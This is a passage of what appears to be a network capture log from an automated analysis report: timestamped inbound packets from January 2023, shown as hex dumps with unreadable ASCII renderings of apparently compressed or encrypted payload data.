4b e6 8c 80 8d df 8e 3f a4 e1 20 1c f9 59 ef 33 ec e8 15 ee 81 7f e6 fd 9c 0d dc ee 2f 72 17 Data Ascii: FTV5)=Kf2!p_uG_ws2*w]4u<ID/`$AB^pe$1F5{n:G#{+cI69M6BHL:#NJQ6.o)3F}}-$+-,L8]yMeK? Y3/r
2023-01-05 12:18:10 UTC	972	IN	Data Raw: dd 6e 74 c2 66 c5 ac af da a2 c1 21 48 e9 23 ec b2 da 6d 16 6c 17 3c 6b be 3c fe 3f dc 8d 2d 44 79 8a a7 a6 27 16 ea 98 6a cd 84 ac bf 72 4e 4a db 92 cb 3d 99 dc 89 dd d0 a4 89 5a 80 c0 48 87 1f b5 95 a9 fd 4d cc 22 92 77 f7 c0 27 97 b0 cb de f3 a0 f9 2e e8 30 b4 f5 71 9b 1d 8a fd b8 ef 03 73 bf 2c be 6d 81 dc 9e 65 4a c3 ec 57 0b ab 88 66 b3 c5 66 b5 c3 de 8b 65 e3 44 f8 d8 48 f4 85 06 5f 8e 24 9b 6d ff e3 2a c7 69 8e c6 b8 b8 22 fa d0 de 5f bb 42 ec 81 eb 15 9c 74 42 7f fa 9f 37 1a d1 ad 54 3c d3 b6 33 6e 81 ae 72 37 ea b0 97 ba 92 9a a6 58 72 b1 09 a3 db c5 5e 22 87 70 85 c7 7b 8c 83 32 4b ef 1e 83 f5 b5 6f df 14 a1 fa f2 96 85 44 e8 38 61 71 18 aa 5e b4 c2 af 2c e5 0e c3 a6 42 a6 1e 66 98 b2 a7 e7 4c a8 30 24 4f 98 d5 0c 9f df 35 6b 07 f6 91 62 5d 4c Data Ascii: ntf!H#ml<k<?-Dy'jrNJ=ZHM"w'.0qs,meJWffeDH_$m*i"_BtB7T<3nr7Xr^"p{2KoD8aq^,BfL0$O5kb]L
2023-01-05 12:18:10 UTC	973	IN	Data Raw: 46 a3 da 8a fb 9e 26 b5 f9 a8 51 09 3d d6 73 3b 0e 81 5f cf 52 f3 79 18 82 3c 82 8c 2a c3 f1 6f 1a d6 cf a4 61 e9 4b f5 e5 f0 a8 49 f0 0b 76 f8 eb 58 7a 92 2d e7 7d ed 2c df 6e e2 6b f2 ed 76 7e d0 6d c9 1f a3 e6 33 b8 ba 19 22 32 a2 9e bd 15 b3 f9 ec f6 b4 17 d8 7b 38 c6 c0 a9 be 3b dd dc e4 0d 82 46 e6 30 7f 73 a4 e3 fc 82 27 56 e7 6a 0e bb 73 f2 7b 0a 6f 57 ce 0a 37 e9 e1 60 e6 a1 1f 60 d1 8d 98 d5 22 af b7 63 bb 51 e1 d8 fb 15 a2 05 5a 77 9b 77 f5 7f 5e f9 49 63 91 5c 18 19 b5 df d5 11 af 08 3e 2e f8 db 1b df fd 95 6a cf f5 77 ac 01 e3 34 8e eb e5 70 9f 42 93 f7 b6 f8 5d e8 23 df 0c 78 d1 70 11 0b 12 59 61 67 a6 34 c2 e0 03 76 95 23 6a a1 11 65 85 b1 cb c4 b9 30 6e 46 6b e6 d2 7c ef db b1 ca bd a0 de a2 14 ab d1 49 78 8a 62 6b 9d db 08 dc a0 9d f2 91 Data Ascii: F&Q=s;_Ry<*oaKIvXz-},nkv~m3"2{8;F0s'Vjs{oW7``"cQZww^Ic\>.jw4pB]#xpYag4v#je0nFk\|Ixbk
2023-01-05 12:18:10 UTC	989	IN	Data Raw: 3d 23 32 fa 09 8d 26 4d 6e 7c 1b 7a 06 bb ce fe 64 6f 72 4f 64 da 07 d5 fa 12 af d6 0d e4 b6 5e 7f f5 e6 69 93 e7 b6 2a 79 56 4b 75 fa 47 79 0e 99 d8 c5 1c 3c 2c 8b ed a5 e4 b9 4a ea 09 5b 73 a8 f7 78 f8 b0 70 64 b5 94 3c 9b 76 a2 16 41 68 61 1b 79 b5 1f 1c 5b 30 a7 46 bb 3c bb 76 aa fb d2 71 f2 8c 9b 15 c0 7f 9f f7 ee fc 57 1b 42 9b a6 ac e3 b8 ff e3 ed cc e3 6a 4a ff 38 de aa 22 4b 64 ad d1 d7 3a 4c 96 18 52 69 23 a6 05 a5 94 ee 3d 22 37 ee 8d 24 75 45 92 90 3d 65 8b 2c 59 2b 42 4d a2 54 96 b1 53 93 a5 4c 32 c2 14 0d 89 1a c3 8f 86 22 f9 9d e7 9c 7b d2 73 ee 73 ca cc 6b 5e f3 47 2f b7 97 fb bc 7b ee 39 f7 7c 3f df ef f7 f9 9c e7 cc 69 94 23 d3 f1 58 af f6 fc 66 30 2c c8 59 27 18 8f 87 5b 93 9a 4a c6 1f f5 e0 f4 50 87 95 a4 78 3c 81 37 c2 8a 17 8f 51 f9 Data Ascii: =#2&Mn\|zdorOd^i*yVKuGy<,J[sxpd<vAhay[0F<vqWBjJ8"Kd:LRi#="7$uE=e,Y+BMTSL2"{ssk^G/{9\|?i#Xf0,Y'[JPx<7Q
2023-01-05 12:18:10 UTC	990	IN	Data Raw: ff a5 a6 31 6c a8 69 5c 46 f9 3f 65 2e ab f0 fe 5d 43 29 19 0c 74 b3 68 0d 9e 07 1f c5 c8 28 a8 d1 1f 1b 01 b7 8a 74 4d 29 a9 48 22 6d 42 26 8f e1 ab 05 29 a9 61 f1 90 ae df d7 a9 19 99 f4 e0 cd 30 58 49 26 77 86 a6 68 7e f5 ec 84 be ba 71 8a 5d 40 91 e2 d9 d2 ff 76 54 ac 0d 20 a5 4b 6e 50 3a ff 81 de 4e 60 ae e6 9e d4 a4 92 cc e1 4d d9 1b 4d b9 d3 19 f1 5d a8 ee 7e ee 1e 49 11 96 89 09 0b c2 3b 26 7d 74 81 92 f4 83 ed 85 15 72 87 98 b0 20 6c 54 36 f8 09 b8 5c 3d f1 97 b0 66 a5 8a 09 32 d9 d6 78 e4 2d 28 6f 61 fc 80 a8 ac d7 78 43 d6 a3 21 1d 77 6c 5e 02 eb 82 02 57 08 28 ff 43 de 20 0f a4 74 d7 98 2a e6 fa f4 fd 3e 5f 7d d6 9a eb 2e a1 d7 49 0a c1 62 c5 4a 45 7c ee 32 04 2c 7b b7 9f 24 56 6f 49 df a9 a9 6d dd 0b a1 3c 6e ea 27 92 58 e9 50 84 65 c0 1f 33 Data Ascii: 1li\F?e.]C)th(tM)H"mB&)a0XI&wh~q]@vT KnP:N`MM]~I;&}tr lT6\=f2x-(oaxC!wl^W(C t*>_}.IbJE\|2,{$VoIm<n'XPe3
2023-01-05 12:18:10 UTC	1006	IN	Data Raw: 4e 49 d5 75 49 0a 27 c6 42 a4 2b 37 0c 9e 41 a6 9f fa 65 42 af f0 bd 14 9c 14 c3 92 fa 53 b4 e5 41 4e 8c 85 48 0b 46 fd 5c 00 3b 3f 7d b8 48 98 fc 71 39 88 93 76 b0 a4 01 14 9d 7c 88 13 63 21 9d de 9d b7 73 1e c4 05 3b bc 25 0c 79 e5 1f c2 49 eb 58 92 05 45 f7 38 c2 89 b1 10 e9 d3 e9 63 3f c1 36 e3 ee 2f 08 03 9f c3 8e e0 a4 bd 2c 09 28 3a e2 28 27 c6 42 a4 11 03 b2 cb 20 65 42 fa 39 82 4e 4f 38 8a 93 4e 48 75 fa c7 34 4e 8c 85 74 fa dc ab ae 67 a1 f4 f2 09 2b c2 44 8b 56 3a 4e 5a c1 92 46 51 f4 bc 0c 4e 8c 85 48 4d 01 b7 03 e1 b5 4b 65 36 a1 a7 3a 2c 03 27 6d 65 49 66 14 5d 95 c9 89 b1 10 29 50 7d 62 2c 84 17 5d ec 42 e8 37 7d 95 89 93 e2 58 92 01 45 ff 7c 9c 13 63 21 92 db 1a 91 1d 3c 52 da e4 4d 18 3f 9c 71 1c 27 ad 67 49 23 28 fa 4c 16 27 c6 42 8a bf Data Ascii: NIuI'B+7AeBSANHF\;?}Hq9v\|c!s;%yIXE8c?6/,(:('B eB9NO8NHu4Ntg+DV:NZFQNHMKe6:,'meIf])P}b,]B7}XE\|c!<RM?q'gI#(L'B
2023-01-05 12:18:10 UTC	1007	IN	Data Raw: 0a 0c ad c2 49 99 2c a9 0b 45 6f 78 80 93 66 20 d2 9b 7c 37 15 18 c0 7b 14 4e 98 74 4d 78 80 93 62 59 52 1f 46 d3 fd 89 93 74 10 69 4c b0 de 13 48 d9 a4 44 13 a6 00 b5 aa 71 d2 26 96 34 94 d1 74 35 38 e9 12 9a 6e cb de b8 b7 23 34 2e cc 1c 43 98 74 0d ab c1 49 51 2c c9 84 a2 ab 1e e2 a4 10 44 6a be 30 2c 16 8c 9e 9c ef 4c 28 db 34 3c c4 49 c9 2c 49 97 a2 c7 3f c6 49 56 88 64 6a 52 79 00 d4 ae f5 72 24 6c 07 32 fb 31 4e da c9 92 8c 29 3a ef 2f 9c f4 37 7b f0 99 fa 87 26 30 2f 18 1c 48 28 de 95 fd 85 93 4e b3 24 45 8a 36 7f 8a 93 f6 21 d2 e9 aa cd c7 e0 c9 c9 67 67 09 99 65 a7 a7 38 e9 28 4b d2 a0 e8 f8 5a 9c 44 21 d2 fc 61 eb d5 20 d6 a5 8e b4 57 db 89 5a 9c 94 cd 92 3a 52 b4 e6 73 9c a4 8e 48 a9 bf 6f eb 00 3a e3 df 77 24 6c 07 32 f0 39 4e 0a 64 49 8e 14 Data Ascii: I,Eoxf \|7{NtMxbYRFtiLHDq&4t58n#4.CtIQ,Dj0,L(4<I,I?IVdjRyr$l21N):/7{&0/H(N$E6!gge8(KZD!a WZ:RsHo:w$l29NdI
2023-01-05 12:18:10 UTC	1023	IN	Data Raw: 14 fd 86 1f 80 a7 be bf a2 3d 25 5d a5 34 36 07 4b 6f 84 e4 4a e8 89 1b 58 0a e6 52 f8 f2 a5 b3 60 91 43 33 b4 b2 c7 56 29 5d bb 81 a5 bd 42 da 4a a8 cd 2d 2c f5 e6 d2 cc d1 4d 4f 80 79 7a 62 90 ca 57 26 3d 6f 61 a9 81 68 71 4b 42 a3 73 2b 0c 55 79 42 51 7b e2 ab 20 70 cf ce 47 b5 8b 92 52 62 2e 96 76 8b 32 45 11 5a e7 36 96 8e 70 89 de 49 53 60 ab 47 56 7b 4d 29 58 4a 96 b7 b1 94 20 a4 60 42 97 dd c1 d2 54 2e fd f6 48 a7 08 2e 36 d8 b2 47 53 3a 26 a5 cd 77 b0 b4 5e 48 c7 08 7d 7f 17 4b 0d b9 14 bd b1 de 7d 08 de 36 3c 42 25 ba d5 bd 87 a5 2e a2 9d b4 09 f5 c8 c3 52 0e df e1 c4 7e a7 65 1c d4 31 9b 8b 56 1e 4a 93 d2 e2 3c 2c ad 10 65 4a 23 34 e7 3e 96 d6 0a 29 f0 ed 0a e8 36 4c 07 2d 5e 7b 4a 4a cf ef 63 69 a5 90 4e 11 da e7 01 96 9c b8 54 e7 75 fc 10 78 Data Ascii: =%]46KoJXR`C3V)]BJ-,MOyzbW&=oahqKBs+UyBQ{ pGRb.v2EZ6pIS`GV{M)XJ `BT.H.6GS:&w^H}K}6<B%.R~e1VJ<,eJ#4>)6L-^{JJciNTux
2023-01-05 12:18:10 UTC	1024	IN	Data Raw: a5 22 21 8d 62 7d ba 6a 58 b2 e2 52 81 43 dd 65 e0 38 99 a2 a9 9b 83 a5 94 54 0d 4b ef 84 34 98 50 fd 1a 58 ca 7b c6 27 1b 0f 4e b3 83 dc 24 6d 0f 95 c9 2b 56 35 b0 64 2e da 09 08 5d a1 87 a5 5f b8 e4 d5 67 47 32 9c 5e ee 97 af 29 6d 2f ef d3 e9 61 29 56 94 69 3b eb d3 d5 c4 92 33 97 c2 e2 b2 77 40 1a 54 46 d7 f1 0b 52 aa 5e 0b 4b 8b 85 74 81 d0 c9 b5 b1 a4 70 69 e8 18 1d 07 e8 19 de 06 f5 0e 8f 4a e9 e7 da 58 da 20 a4 a3 84 e6 d6 c1 d2 b1 a7 4c ba 9e 7f 26 0a 6e 95 f5 40 fd a7 e9 52 7a 59 07 4b 7f 08 69 3a a1 fd f4 b1 34 93 4b 0b 46 95 b8 43 43 cb df 51 5e 30 bf bc 4f a7 8f a5 2b 42 9a cf fa 74 06 58 6a c2 25 9d 49 8b 22 20 c3 b0 05 ba ed 64 8d 94 2e 1b 60 29 59 48 6b 08 b5 36 c4 52 ee 13 26 bd ab bc 3d 1f 7a 66 8c d4 d2 94 26 4b a9 b3 21 96 f2 84 34 99 Data Ascii: "!b}jXRCe8TK4PX{'N$m+V5d.]_gG2^)m/a)Vi;3w@TFR^KtpiJX L&n@RzYKi:4KFCCQ^0O+BtXj%I" d.`)YHk6R&=zf&K!4
2023-01-05 12:18:10 UTC	1040	IN	Data Raw: ff a8 14 10 5d 29 a1 ac 6d 5e af d3 8e aa c6 a9 d9 7f 56 b1 84 ff aa 66 03 15 fb 51 2f ae 86 c9 91 e4 30 5b ac 6b c9 91 94 7b 24 ed 95 6e ef fc 3c 7e 2b b6 29 0a 50 95 a9 79 3b bf 2b f1 d5 cb 05 0f 2a bf 05 46 d5 db b6 da 8a 5b d4 98 6b fa b8 37 4d 58 28 8a 4d c8 75 1d 97 7b 5f 79 16 e5 75 d4 b7 fa 75 c5 8f 4b aa 3d b2 3e 74 f6 e4 44 1c ad b8 db 87 85 5a 67 27 e6 c6 29 fb 4d 5e 63 7a 91 52 d3 1a f2 28 cc e9 60 6d 8d d5 d5 b3 79 2e 47 03 7b 42 d6 94 1f fc fb bd 67 7b dd df c5 07 db be 3a 06 a8 e4 c4 f6 bc 59 74 be 45 f9 d3 58 8d aa de 27 2f 92 26 4d 18 93 26 d2 0d ac 73 aa d4 13 e9 b1 7f 7e 74 ef c3 ba 74 b5 ab fc e8 2f ac 6e bb 3e bf 1e 91 1b b2 6c 93 56 67 45 8f 5d dd 02 c3 19 a2 ad a5 9a 2f 93 14 9a 6a ad 55 ea 96 7e 9e 11 44 af f3 da 31 3d e8 75 d2 3e Data Ascii: ])m^VfQ/0[k{$n<~+)Py;+*F[k7MX(Mu{_yuuK=>tDZg')M^czR(`my.G{Bg{:YtEX'/&M&s~tt/n>lVgE]/jU~D1=u>
2023-01-05 12:18:10 UTC	1041	IN	Data Raw: 1b 85 6d 16 26 42 e7 cc 18 cf 6d ca 46 ff 66 ed 0b aa f5 19 5f f4 ff 75 06 06 4e 09 e1 cf 08 28 fb b2 ca 6e 79 90 43 97 96 58 dc fe 7b 7a f8 ed dc ab 19 69 fe f8 b2 95 82 82 4b fc c7 34 44 03 ca a5 8a 13 c0 d9 8a 51 55 79 c4 23 3c 0b 92 0d 71 61 01 4b 4f 70 7e 88 9b ee cf 74 56 19 8d ee f8 c8 da 8e e9 ba 68 2c a5 18 45 2a 59 76 9b 4d fb b2 08 bd b6 9d fc 1b 1e 05 35 d1 89 98 de 1e 0c 68 0a fb d8 fe 09 9a f8 7c 8b de 7c aa 3b 4b 9b 7f e4 b1 f5 4e bd ee 74 a4 1b 31 83 71 59 c5 65 36 62 12 77 a1 15 cd 88 30 1c 67 d7 c1 f5 bf 2e 86 47 1a 39 48 d1 ea 49 75 eb d6 1e 44 39 56 69 14 fd e2 e0 5e e0 1e 8d 7d 9b 71 09 61 81 0b 7b 14 31 d0 9e ce 81 bf 10 ea 9e 77 6e 3e cc 64 f8 77 85 ff dd 0e 9d a2 88 2f 2f e3 7e ec 97 c0 0a 47 16 0f 3e 95 4c 6f e6 cd 04 1a f6 df d2 Data Ascii: m&BmFf_uN(nyCX{ziK4DQUy#<qaKOp~tVh,E*YvM5h\|\|;KNt1qYe6bw0g.G9HIuD9Vi^}qa{1wn>dw//~G>Lo
2023-01-05 12:18:10 UTC	1057	IN	Data Raw: 4c d0 dc f8 cb b9 1e e5 df b3 ec 72 2d 18 ce 07 63 3e a0 4e 00 92 02 a8 ea 40 de eb a5 08 21 5c 69 44 83 6c be cb 71 46 68 25 8f 9a d6 98 10 d1 34 d3 d1 23 af 5d bc 71 6f 32 91 d4 65 ef 28 ca b7 f5 00 da 7b a9 3b 7f ed 9c 0b dc ac 25 00 fc b2 41 05 f2 c5 a5 0e 1a 13 9b f3 2b 2f 19 ea ec 7c da 6a 72 b2 c4 0b c5 08 30 e1 e0 9f a5 df 5f ef bc f7 07 3d ff 66 67 77 7f 3e fb 87 77 72 7a 44 36 18 d9 a8 da 44 39 47 15 2b 04 de e9 43 05 4e 54 db 37 2f 11 38 66 53 63 39 6d e0 f1 e0 8b 84 a7 06 57 b0 57 2d a9 19 4a 30 fb 3d b7 83 2f be 6d a8 f7 93 eb 0c 65 b3 4e 40 65 dd bf 65 fc 94 0e 7c e0 87 a3 47 e3 cf 83 d8 c0 70 a1 16 bf 19 e1 50 f3 bc 58 d3 9a a1 cf f1 47 fc 91 b0 f7 f3 4e f7 e7 12 dc 36 af 97 d7 6b dc 7e 69 4b f1 e6 e2 c1 e2 7f 3b ff a5 dd 18 e4 42 c7 c0 1f Data Ascii: Lr-c>N@!\iDlqFh%4#]qo2e({;%A+/\|jr0_=fgw>wrzD6D9G+CNT7/8fSc9mWW-J0=/meN@ee\|GpPXGN6k~iK;B
2023-01-05 12:18:10 UTC	1058	IN	Data Raw: 1f 3f 01 ec e3 40 7b c6 3e d1 30 5c e9 bd 2a 5c 4c ce 67 89 54 5a 17 cc 48 75 82 2d a6 7b f3 86 b5 ca 54 b9 ae 47 5a db 27 a5 ee 65 c0 0b f9 27 4f 00 a7 50 c4 c9 7b 2b a3 0d c3 47 92 bb ca 90 56 60 f5 f9 d2 62 02 c4 d2 b5 e1 f2 18 e5 da d0 f6 5e a4 d6 33 87 9a 11 b1 cf 75 36 3a eb 1b 83 da 4d 44 03 d4 47 df f2 da a7 e2 13 17 cf 40 2a dc 4d 06 f1 9a 9b af f3 09 a2 0b ac 61 a1 b0 06 f9 9c 19 8b ae 40 bb 5c f0 cc aa 59 5d e2 ea b0 c4 d6 9b bb ea 7c 27 00 a7 e2 14 56 ff 47 9b 49 5b 77 38 05 35 19 43 7d a2 0e 9a 78 c8 c9 08 8e b9 9a ad 86 54 71 cb 2d c8 7a aa 68 ed 96 ac b8 e7 09 c0 b0 36 49 f7 0e 62 fd a9 63 cd c7 c5 36 4f 4f 76 df 99 36 c6 76 dd 79 e0 44 45 0b af 10 7e 88 10 b1 d3 f9 08 aa 0e bb 36 f2 d0 b5 70 46 dd 51 60 44 49 b9 30 ac 52 5b bd be 37 4b 86 Data Ascii: ?@{>0\\LgTZHu-{TGZ'e'OP{+GV`b^3u6:MDG@Ma@\Y]\|'VGI[w85C}xTq-zh6Ibc6OOv6vyDE~6pFQ`DI0R[7K
2023-01-05 12:18:10 UTC	1074	IN	Data Raw: e6 f5 f1 f0 61 c9 b9 a7 f3 dc 25 c0 03 9c 61 d0 c7 42 22 cb f2 dc 91 ba be 9d d5 48 bf bf 4f 5c 6c be a2 14 7c 5a 37 69 e6 57 c7 2b 6c b9 cf d1 70 83 ce 56 df f6 76 d9 23 b5 21 41 97 0d 6a d6 66 f1 5e f3 c8 24 5f ea 9b 02 ad 16 b0 5b ea a1 f4 6f e9 44 e2 f1 19 f6 06 ce f0 8e 89 f3 43 e7 55 73 bf c1 ba 2c 5d 85 47 1c d5 5f a1 ed 99 1d 4a 8a 5d cb 51 f2 e0 61 52 5a 3b 83 b4 97 a5 56 b6 25 f6 cd ef 34 f0 46 f2 17 79 45 68 c8 be 76 b3 e7 5e 2b cb 7b 25 77 9d 3e 7f 55 2b 3c 8d b4 9b 09 cf b3 92 78 db 18 18 ee 59 e7 9d ec 74 3a cc 7d c0 37 95 9e d8 c9 8e e3 ee ff d9 43 6f ce 5b df 84 c4 c4 a4 7c 01 24 1b 9e 14 e0 d8 8a c8 2a 55 cf a9 88 2c 71 64 66 48 59 e9 32 8e 2b 2d e2 4c cd 5f 30 53 f6 28 51 e0 0b 88 d6 99 50 7c 70 eb fb 49 6c 84 7c e3 b3 ba c6 11 5b 43 04 Data Ascii: a%aB"HO\l\|Z7iW+lpVv#!Ajf^$_[oDCUs,]G_J]QaRZ;V%4FyEhv^+{%w>U+<xYt:}7Co[\|$*U,qdfHY2+-L_0S(QP\|pIl\|[C
2023-01-05 12:18:10 UTC	1075	IN	Data Raw: f3 94 39 39 cf c1 c8 90 34 ac 63 35 86 e5 ab 78 44 c7 cb 03 01 13 d8 56 9c 08 7c 3c 40 11 a2 ae 37 71 7a 25 f6 3c 3a 56 f6 bb ea a6 ea 66 3c d8 9e 89 ed ce c3 a2 18 db 14 d6 c0 50 18 08 ec 04 a4 93 e6 62 0e f5 f3 f3 72 2c 50 f7 b9 7e 9e 33 6f ef bc d5 18 c7 45 fe 4e 35 c7 33 91 dc 5a e5 c7 a9 64 d7 7b c1 cf 71 2d c5 15 ec 6b 5b bd 03 68 7c 94 64 e3 8c 6c 37 7f fe 2b ae 90 a1 f1 31 72 30 7a 4c fa b8 4c bb 98 1a 3a 2a 46 f8 60 34 95 28 76 3b 0f 66 a4 a6 da e6 ff 65 26 7b f3 75 fc be 5e b1 fd c3 ba 6e 84 79 6f fd eb c0 77 f5 f3 99 59 8c 0f 97 d3 7d 2a 16 e5 1d 8b ae 92 0f 53 0f 28 cc ca 62 ef a4 2d ad 93 6c 7c f0 eb a1 74 6e 92 3a 0e 1a 16 7f cd d5 9d 45 6d 17 c4 04 53 ec 8b 77 83 68 28 8d c3 79 47 ef 59 27 5e 0f 99 fe b1 30 94 70 50 c1 fa a9 21 bf 50 80 f2 Data Ascii: 994c5xDV\|<@7qz%<:Vf<Pbr,P~3oEN53Zd{q-k[h\|dl7+1r0zLL:F`4(v;fe&{u^nyowY}S(b-l\|tn:EmSwh(yGY'^0pP!P
2023-01-05 12:18:10 UTC	1091	IN	Data Raw: 00 28 15 e5 78 5c f3 a7 92 58 9d 27 8d 01 4c dd c6 ea 04 ac c5 d9 68 77 59 6e b6 f2 3e d0 3d 15 d4 99 55 02 fa 7d 3f 72 7f 4f 69 d1 0b a3 3f 17 fc 23 c3 02 f5 2b 5d 07 64 ff 5f b3 5a b6 d4 a0 61 9d e5 79 fe 0a d4 76 37 eb f7 1d b1 fb 13 c9 83 f4 ff 50 ee 0f 9c ff 9d b8 a8 23 83 ba d1 20 a7 bf 49 ee 02 9c e5 04 f9 ab 42 03 2c 65 1a fe 48 99 c9 f9 54 14 63 b7 4f ce 62 99 38 e8 9a 0b df 4b bb dc 0c 1d 57 1a da b9 b5 04 6a 95 45 5c ab 8c 8a 98 b2 c2 6c fd eb d6 b7 ff 17 c9 be 5f 69 fc 37 92 84 4f ff b5 b2 9d ff 1f 26 93 f6 57 ff 3d 85 e9 bf 4c f7 a8 ff f7 14 96 7f 3f 55 81 ff b1 44 f9 77 b2 26 eb 3f a0 27 02 7f ef c9 ff 49 53 dc ff f0 f1 f2 ff cf d5 ff 13 e7 ea 3f 88 8b a8 d9 9a 6e 43 5b c7 c4 34 43 b4 df 47 4d 55 02 70 04 b3 6e 66 f2 85 fd 9f a7 8a 58 0c 00 Data Ascii: (x\X'LhwYn>=U}?rOi?#+]d_Zayv7P# IB,eHTcOb8KWjE\l_i7O&W=L?UDw&?'IS?nC[4CGMUpnfX
2023-01-05 12:18:10 UTC	1092	IN	Data Raw: 53 e2 5e b7 5a 4a a5 97 c8 8c 03 94 df 32 4a c4 c6 a7 41 18 2f 80 6b 99 95 d9 c0 fc ea 83 15 c2 15 66 0e 5e ce 80 b8 d2 fa 7a 6b 5d 47 5c 94 1f b2 c2 5e c6 1d 8f 58 d6 3b bf 7a 91 f9 5c 83 51 87 f7 f1 10 38 45 41 a7 f1 54 b2 a2 e4 1c 7d 4b 1b e2 3f 4a df 0f 51 84 02 bb 90 a0 db a6 9a 27 8e 69 51 db e3 6d fd 91 6f e7 eb ca aa 4c 6b 7e 2c 58 a6 88 5b ee b8 ae 97 4a 92 28 ad 12 80 d1 77 82 a6 8d 1b 7a 04 e8 7c 85 75 5c 89 11 e2 1a e3 01 b8 2e 29 69 c0 70 be d3 cd c6 31 48 84 da c4 c3 41 aa ef 49 d2 cb 8e 2d 34 42 52 d4 a3 da c1 d1 05 bb 3c 9c f0 e6 0e e7 ba 0b b3 e9 8b c5 2e b3 fe 84 e3 65 f8 c4 91 fe c5 fc b9 4c 29 04 88 a2 68 d0 82 71 c5 d7 92 de f2 a5 91 87 f5 87 79 c5 5a 1c b9 94 d7 91 52 38 a4 a4 2d 87 57 d8 ff ec df e4 80 8b 1b 3b 31 6c 66 a4 26 39 13 Data Ascii: S^ZJ2JA/kf^zk]G\^X;z\Q8EAT}K?JQ'iQmoLk~,X[J(wz\|u\.)ip1HAI-4BR<.eL)hqyZR8-W;1lf&9
2023-01-05 12:18:10 UTC	1108	IN	Data Raw: ce 36 7d c9 d5 7d 7d 00 be 5c ba cc b3 d2 d6 55 7e 62 f0 87 37 ba ad 2c b7 7a 03 14 ad 1b d9 d9 8c 8f f3 76 4b 98 37 f1 40 51 79 b9 56 9d cd 7a ef 0f 67 e4 67 67 8f 06 55 61 94 59 f0 92 f1 d5 d6 a5 f9 4c 24 c7 8b 87 d7 42 64 54 d4 53 54 48 9f 04 a5 e9 59 58 1d 1d 9d 5b f3 3a 74 5d 27 96 90 42 b1 c0 2e 11 ad 89 4d 74 57 2c e6 a8 7e 81 f1 0e ce 79 90 2a 23 52 ae 6e ff 4c fc 0e bd 25 16 d6 b9 3c 48 96 7a c4 03 32 ba 33 ba 55 2c 34 56 f7 97 9d a1 80 d5 02 52 74 30 49 ae 65 86 02 97 02 6f b9 f9 8c c2 69 72 45 0f 36 7c 2f 37 46 61 13 f6 9b d9 9e 5c 99 fe ab 21 bd 73 be b8 0e 62 06 ea 83 c5 88 d7 c4 b0 8e 1b 4f 98 50 43 82 37 32 93 eb a6 38 70 f8 0b 74 9f ca 9b e5 06 0b 20 da 3c 31 3c de 0e 76 07 28 f9 95 92 80 26 28 f9 f4 85 7b b3 fb 99 99 0c f0 92 72 1f ef ed Data Ascii: 6}}}\U~b7,zvK7@QyVzgggUaYL$BdTSTHYX[:t]'B.MtW,~y*#RnL%<Hz23U,4VRt0IeoirE6\|/7Fa\!sbOPC728pt <1<v(&({r
2023-01-05 12:18:10 UTC	1109	IN	Data Raw: 73 32 7f a8 cb ff cd 1b 79 3d a3 3c f7 ec e6 28 f1 22 78 e3 28 5b 82 ff 12 ba 71 ce ed ce 61 e7 26 ac 2a 78 6a 14 bd bd d9 dd d0 d2 80 28 52 f6 f1 cc 94 0e b0 4f 5e fd 93 2c ef fb d1 64 d8 d9 b3 d8 55 bd 30 dc a9 6f 22 ee 2d 87 db d0 ba 6d a3 ef ed 20 a6 dd f7 96 ac d5 93 e3 18 07 fa a4 f3 b7 db a6 b8 84 ac 33 5c 4c 6c b7 ab db 92 f2 6d 70 b9 0e 8b e6 eb ab dd d9 97 a2 b0 42 a5 2f 44 d2 e7 02 e8 f8 3a b3 b9 6a 38 1c 95 4c 07 8f 23 d8 d8 74 d1 b8 8f 40 64 4f 69 31 b5 91 6a 81 ef 6e 7a e8 e5 39 a0 fe fc 3b 88 bb 9b 39 d8 9c be b7 2d ce 0f bd 5b 03 cf 77 1e 00 61 d4 5d cc d2 e4 15 b2 eb ee f6 5c e2 b4 eb 9e 67 93 b3 c9 7a ab 4d 8e f4 6f 2b a3 e5 4b 00 ab 6f 69 ae 36 e0 a0 de af 57 93 25 71 25 e4 e4 21 fd b2 7c 3e 5e d7 2f 1e 1b 8f 2f 4d 71 03 31 69 3f 9c 3d Data Ascii: s2y=<("x([qa&*xj(RO^,dU0o"-m 3\LlmpB/D:j8L#t@dOi1jnz9;9-[wa]\gzMo+Koi6W%q%!\|>^//Mq1i?=
2023-01-05 12:18:10 UTC	1125	IN	Data Raw: d1 38 45 a5 8e 28 65 6a d2 b9 d1 7c c3 56 3e a3 f0 08 11 26 25 da 52 d0 7c 3b b3 fe 1c 7f 7b 9a ae 6a c4 ed e6 78 12 b0 0a b3 1d 53 bf 96 11 b5 11 40 11 a5 9c 7e 54 85 97 e7 f7 47 df d7 47 df 94 12 be f7 6b df 97 67 fa ab 16 78 21 21 ec fa 96 8e 8c e3 a5 59 56 af 9c 96 9a b4 3a a2 29 0b 13 19 e2 f9 e1 25 8f 02 6c ed b9 46 cd 8b 05 ab cc 9f 63 eb 43 51 45 28 1a ec 11 28 da f5 25 96 aa fa ee a9 c7 c3 a2 72 f6 55 69 35 02 95 3a d1 f9 13 d3 b3 74 b0 7a 12 16 92 79 ea 98 44 57 ea 54 31 60 28 ef 59 7c 60 af 5c 2f fc af a7 ef 0f b3 36 3a df bf 2a 85 de 37 59 5a 12 af 66 c0 44 52 7f 35 c4 b6 94 da d7 f7 4d 0d 2d 41 c3 bb 96 83 66 ad 4e 30 86 5c 7d d9 74 18 5c 53 18 d5 4a 45 d5 b1 6c 03 db d2 91 c9 7f 61 84 de 94 64 23 2e d2 f7 5d c6 49 24 d7 6d be c8 68 c5 40 b9 Data Ascii: 8E(ej\|V>&%R\|;{jxS@~TGGkgx!!YV:)%lFcCQE((%rUi5:tzyDWT1`(Y\|`\/6:*7YZfDR5M-AfN0\}t\SJElad#.]I$mh@
